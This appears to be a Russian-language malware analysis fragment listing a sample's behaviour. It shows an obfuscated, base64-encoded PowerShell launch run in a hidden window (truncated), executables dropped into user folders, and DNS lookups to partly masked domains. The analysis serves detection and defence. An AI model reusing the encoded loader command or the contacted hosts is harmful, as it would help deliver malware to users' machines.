Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAHcAbQB3AGcAeQA4AD0AKAAnAFAAYwAnACsAKAAnADQAXwA5ACcAKwAnAGcAaQAnACkAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBQAHIAbwBmAGkATA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1520
- %TEMP%\482604.cvr
- %HOMEPATH%\j2g0g83\o2w6a3v\fzip3b.exe
- %HOMEPATH%\j2g0g83\o2w6a3v\fzip3b.exe
- DNS ASK sh###meng.org
- DNS ASK ca#####dezandgaten.nl
- DNS ASK ca#######ezandgaten.nlmenu9_com
- DNS ASK fu##.hbr26.com
- DNS ASK kh##.##fantasy.gallery
- DNS ASK to###vel.com.br
- DNS ASK ca####ayviews.com
- DNS ASK fe##.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAHcAbQB3AGcAeQA4AD0AKAAnAFAAYwAnACsAKAAnADQAXwA5ACcAKwAnAGcAaQAnACkAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBQAHIAbwBmAGkATA...' (со скрытым окном)